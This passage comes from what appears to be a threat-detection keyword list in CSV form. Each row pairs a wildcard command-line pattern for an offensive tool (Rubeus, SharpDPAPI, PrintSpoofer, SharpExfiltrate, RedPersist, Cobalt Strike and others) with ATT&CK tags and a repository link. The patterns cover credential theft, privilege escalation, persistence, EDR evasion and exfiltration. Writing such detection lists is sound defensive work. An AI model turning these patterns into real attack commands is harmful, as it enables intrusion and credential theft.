/pvk:*.pvk*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - 
TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*.exe -d * -u * -p * -m LDAPS*,offensive_tool_keyword,SharpLdapRelayScan,SharLdapRealyScan is a tool to check Domain Controllers for LDAP server protections regarding the relay of NTLM authenticationvand it's a C# port of?LdapRelayScan,T1557.001 - T1078.003 - T1046,TA0002 - TA0007 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/klezVirus/SharpLdapRelayScan,1,1,N/A,7,1,72,16,2022-02-26T22:03:11Z,2022-02-12T08:16:59Z -*.exe -d 1 -c cmd.exe*,offensive_tool_keyword,printspoofer,Abusing impersonation privileges through the Printer Bug,T1134 - T1003 - T1055,TA0004 - TA0003 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,0,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*.exe -d 3 -c *powershell -ep bypass*,offensive_tool_keyword,PrintSpoofer,Abusing Impersonation Privileges on Windows 10 and Server 2019,T1548.002 - T1055.001 - T1055.002,TA0005 - TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,0,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*.exe dump /luid:0x5379f2 /nowrap*,offensive_tool_keyword,AD exploitation cheat sheet,Unconstrained delegation Exploitation with Rubeus,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.exe --eventviewer *.exe*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*.exe exec * cmd interactive*,offensive_tool_keyword,BesoToken,A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).,T1134 - 
T1003.002,TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/OmriBaso/BesoToken,1,0,N/A,10,1,91,11,2022-11-23T10:45:07Z,2022-11-21T01:07:51Z -*.exe Get-DomainController -Domain * -Server * -Credential *,offensive_tool_keyword,SharpView,C# implementation of harmj0y's PowerView,T1018 - T1482 - T1087.002 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,Discovery,https://github.com/tevora-threat/SharpView/,1,0,N/A,10,9,850,206,2021-12-17T15:53:20Z,2018-07-24T21:15:04Z -*.exe -gettgs -luid:*,offensive_tool_keyword,GIUDA,Ask a TGS on behalf of another user without password,T1558.003 - T1059.003,TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/foxlox/GIUDA,1,0,N/A,9,4,387,50,2023-09-28T15:54:16Z,2023-07-19T15:37:07Z -*.exe gmsainfo --sid *,offensive_tool_keyword,GoldenGMSA,GolenGMSA tool for working with GMSA passwords,T1003.004 - T1078.003 - T1059.006,TA0006 - TA0004 - TA0002,N/A,N/A,Credential Access,https://github.com/Semperis/GoldenGMSA,1,0,N/A,7,2,113,17,2023-07-03T09:35:48Z,2022-02-03T10:32:05Z -*.exe GoogleDrive --appname * --accesstoken * --filepath * --extensions * --memoryonly*,offensive_tool_keyword,SharpExfiltrate,Modular C# framework to exfiltrate loot over secure and trusted channels.,T1027 - T1567 - T1561,TA0010 - TA0040 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/Flangvik/SharpExfiltrate,1,0,N/A,10,2,116,26,2021-09-12T17:08:02Z,2021-09-08T13:17:00Z -*.exe -group=all *,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,fp risks,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*.exe -group=all -full*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,fp risks,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*.exe -group=remote *,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,fp risks,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*.exe -group=system *,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,fp risks,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*.exe -group=user *,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,fp risks,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*.exe hash /password:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*.exe -i -c powershell.exe*,offensive_tool_keyword,printspoofer,Abusing impersonation privileges through the Printer Bug,T1134 - T1003 - T1055,TA0004 - TA0003 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,0,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*.exe kdsinfo --guid *,offensive_tool_keyword,GoldenGMSA,GolenGMSA tool for working with GMSA passwords,T1003.004 - T1078.003 - T1059.006,TA0006 - TA0004 - TA0002,N/A,N/A,Credential Access,https://github.com/Semperis/GoldenGMSA,1,0,N/A,7,2,113,17,2023-07-03T09:35:48Z,2022-02-03T10:32:05Z -*.exe krbscm -c *cmd.exe*,offensive_tool_keyword,S4UTomato,Escalate Service Account To LocalSystem via Kerberos,T1558 - T1558.002 - T1548.002 - T1078 - T1078.004,TA0006 - TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/wh0amitz/S4UTomato,1,0,N/A,10,4,315,58,2023-09-14T08:53:19Z,2023-07-30T11:51:57Z -*.exe -l * -c {B91D5831-B1BD-4608-8198-D72E155020F7}*,offensive_tool_keyword,JuicyPotatoNG,Another Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/JuicyPotatoNG,1,0,N/A,10,8,703,90,2022-11-12T01:48:39Z,2022-09-21T17:08:35Z -*.exe -l * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a*,offensive_tool_keyword,JuicyPotatoNG,Another Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/JuicyPotatoNG,1,0,N/A,10,8,703,90,2022-11-12T01:48:39Z,2022-09-21T17:08:35Z -*.exe 
machinetriage*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*.exe masterkeys /hashes*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*.exe masterkeys /hashes*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*.exe monitor /interval:5 /nowrap,offensive_tool_keyword,AD exploitation cheat sheet,Unconstrained delegation Exploitation with Rubeus,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.exe NonstandardProcesses*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,N/A,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*.exe NTLMSettings*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. 
logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,N/A,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*.exe OneDrive --username * --password * --filepath *\*.exe*,offensive_tool_keyword,SharpExfiltrate,Modular C# framework to exfiltrate loot over secure and trusted channels.,T1027 - T1567 - T1561,TA0010 - TA0040 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/Flangvik/SharpExfiltrate,1,0,N/A,10,2,116,26,2021-09-12T17:08:02Z,2021-09-08T13:17:00Z -*.exe --override-file --source-file *.exe*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,0,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*.exe ptt /ticket:*,offensive_tool_keyword,AD exploitation cheat sheet,Unconstrained delegation Exploitation with Rubeus,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.exe -ptt ticket:*.kirbi*,offensive_tool_keyword,GIUDA,Ask a TGS on behalf of another user without password,T1558.003 - T1059.003,TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/foxlox/GIUDA,1,0,N/A,9,4,387,50,2023-09-28T15:54:16Z,2023-07-19T15:37:07Z -*.exe --pwsh *.ps1 *.exe*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*.exe -q 
InterestingProcesses*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,N/A,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*.exe -q PowerShell*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,N/A,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*.exe -q WindowsDefender*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,N/A,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -*.exe rbcd -m * -p * -c *cmd.exe*,offensive_tool_keyword,S4UTomato,Escalate Service Account To LocalSystem via Kerberos,T1558 - T1558.002 - T1548.002 - T1078 - T1078.004,TA0006 - TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/wh0amitz/S4UTomato,1,0,N/A,10,4,315,58,2023-09-14T08:53:19Z,2023-07-30T11:51:57Z -*.exe --remove-reparse --source-file *.exe*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,0,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*.exe -s * -c service_mod *,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -*.exe -s *\x*\x*\x*,offensive_tool_keyword,frampton,PE Binary Shellcode Injector - Automated code cave discovery. 
shellcode injection - ASLR bypass - x86/x64 compatible,T1055 - T1548.002 - T1129 - T1001,TA0002 - TA0003- TA0004 -TA0011,N/A,N/A,POST Exploitation tools,https://github.com/ins1gn1a/Frampton,1,1,N/A,N/A,1,69,16,2019-11-24T22:34:48Z,2019-10-29T00:22:14Z -*.exe s4u /ticket:* /impersonateuser:* /msdsspn:* /ptt*,offensive_tool_keyword,AD exploitation cheat sheet,Rubeus Use s4u2self and s4u2proxy to impersonate the DA user to the allowed SPN,T1550 - T1555 - T1212 - T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.exe s4u /user:* /impersonateuser:* /msdsspn:* /altservice:ldap /ptt /rc4*,offensive_tool_keyword,AD exploitation cheat sheet,Rubeus access the LDAP service on the DC (for dcsync),T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.exe --schedule * *.exe*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*.exe --screensaver *:\*.exe*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*.exe Search Find-Persist*,offensive_tool_keyword,COM-Hunter,COM-hunter is a COM Hijacking persistnce tool written in C#,T1122 - T1055.012,TA0003 - TA0005,N/A,N/A,Persistence,https://github.com/nickvourd/COM-Hunter,1,0,N/A,10,3,215,39,2023-09-06T09:48:55Z,2022-05-26T19:34:59Z -*.exe --set-reparse override --source-file *.exe --target-file *,offensive_tool_keyword,ContainYourself,Abuses the Windows 
containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,0,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*.exe shadowcred -c * -f*,offensive_tool_keyword,S4UTomato,Escalate Service Account To LocalSystem via Kerberos,T1558 - T1558.002 - T1548.002 - T1078 - T1078.004,TA0006 - TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/wh0amitz/S4UTomato,1,0,N/A,10,4,315,58,2023-09-14T08:53:19Z,2023-07-30T11:51:57Z -*.exe -sniffer n*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,0,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*.exe --startup *:\*.exe*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*.exe -t startupfolder -c * -a * -f*,offensive_tool_keyword,SharPersist,SharPersist Windows persistence toolkit written in C#.,T1547 - T1053 - T1027 - T1028 - T1112,TA0003 - TA0008,N/A,N/A,Persistence,https://github.com/fireeye/SharPersist,1,0,N/A,10,10,1150,233,2023-08-11T00:52:09Z,2019-06-21T13:32:14Z -*.exe -t tortoisesvn -c * -a * -m*,offensive_tool_keyword,SharPersist,SharPersist Windows persistence toolkit written in C#.,T1547 - T1053 - T1027 - T1028 - T1112,TA0003 - TA0008,N/A,N/A,Persistence,https://github.com/fireeye/SharPersist,1,0,N/A,10,10,1150,233,2023-08-11T00:52:09Z,2019-06-21T13:32:14Z -*.exe -t wl-extract.dll -d *.dat -r *.rsa -*.exe*,offensive_tool_keyword,whatlicense,WinLicense key extraction via Intel PIN,T1056 - T1056.001 - T1518 - T1518.001,TA0005 - TA0006,N/A,N/A,Exploitation 
tools,https://github.com/charlesnathansmith/whatlicense,1,0,N/A,6,1,61,5,2023-07-23T03:10:44Z,2023-07-10T11:57:44Z -*.exe triage,offensive_tool_keyword,AD exploitation cheat sheet,Unconstrained delegation Exploitation with Rubeus,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.exe triage /password:*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*.exe -uac,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,0,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*.exe --ui *,offensive_tool_keyword,blackcat ransomware,BlackCat Ransomware behavior,T1486.001 - T1489 - T1490 - T1486,TA0011 - TA0010 - TA0012 - TA0007 - TA0040,blackcat ransomware,N/A,Ransomware,https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.exe --winlogon * *:\*.exe*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*.exe --wmi *:\*.exe*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*.exe* -d localhost * -u * -p 
*/24*,offensive_tool_keyword,crackmapexec,windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*.exe* -f *.bin -t queueuserapc*,offensive_tool_keyword,hades,Go shellcode loader that combines multiple evasion techniques,T1055 - T1027 - T1218 - T1027.001 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/f1zm0/hades,1,0,N/A,N/A,3,290,44,2023-06-21T19:22:57Z,2022-10-11T08:16:24Z -*.exe* --Filter *rule disable { condition: true }*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,0,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*.exe* -t queueuserapc*,offensive_tool_keyword,hades,Go shellcode loader that combines multiple evasion techniques,T1055 - T1027 - T1218 - T1027.001 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/f1zm0/hades,1,0,N/A,N/A,3,290,44,2023-06-21T19:22:57Z,2022-10-11T08:16:24Z -*.exe* -t remotethread*,offensive_tool_keyword,hades,Go shellcode loader that combines multiple evasion techniques,T1055 - T1027 - T1218 - T1027.001 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation 
tools,https://github.com/f1zm0/hades,1,0,N/A,N/A,3,290,44,2023-06-21T19:22:57Z,2022-10-11T08:16:24Z -*.exe* -t selfthread*,offensive_tool_keyword,hades,Go shellcode loader that combines multiple evasion techniques,T1055 - T1027 - T1218 - T1027.001 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/f1zm0/hades,1,0,N/A,N/A,3,290,44,2023-06-21T19:22:57Z,2022-10-11T08:16:24Z -*.exe* --technique queueuserapc*,offensive_tool_keyword,hades,Go shellcode loader that combines multiple evasion techniques,T1055 - T1027 - T1218 - T1027.001 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/f1zm0/hades,1,0,N/A,N/A,3,290,44,2023-06-21T19:22:57Z,2022-10-11T08:16:24Z -*.exe* --technique remotethread*,offensive_tool_keyword,hades,Go shellcode loader that combines multiple evasion techniques,T1055 - T1027 - T1218 - T1027.001 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/f1zm0/hades,1,0,N/A,N/A,3,290,44,2023-06-21T19:22:57Z,2022-10-11T08:16:24Z -*.exe* --technique selfthread*,offensive_tool_keyword,hades,Go shellcode loader that combines multiple evasion techniques,T1055 - T1027 - T1218 - T1027.001 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/f1zm0/hades,1,0,N/A,N/A,3,290,44,2023-06-21T19:22:57Z,2022-10-11T08:16:24Z -*.exe* -u administrator -H :*--shares*,offensive_tool_keyword,crackmapexec,windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*.exe*\Terminator.sys*,offensive_tool_keyword,SharpTerminator,Terminate AV/EDR Processes using kernel driver,T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001,TA0007 - TA0008 - TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/mertdas/SharpTerminator,1,0,N/A,N/A,3,266,53,2023-06-12T00:38:54Z,2023-06-11T06:35:51Z -*.exec*.interact.sh*,offensive_tool_keyword,interactsh,Interactsh is an open-source tool for detecting out-of-band interactions. 
It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C4,T1566.002 - T1566.001 - T1071 - T1102,TA0011 - TA0001,N/A,N/A,C2,https://github.com/projectdiscovery/interactsh,1,1,FP risk - legitimate service abused by attackers - move to admintools ?,10,10,2675,317,2023-10-02T08:20:04Z,2021-01-29T14:31:51Z -*.feeds.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.files.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 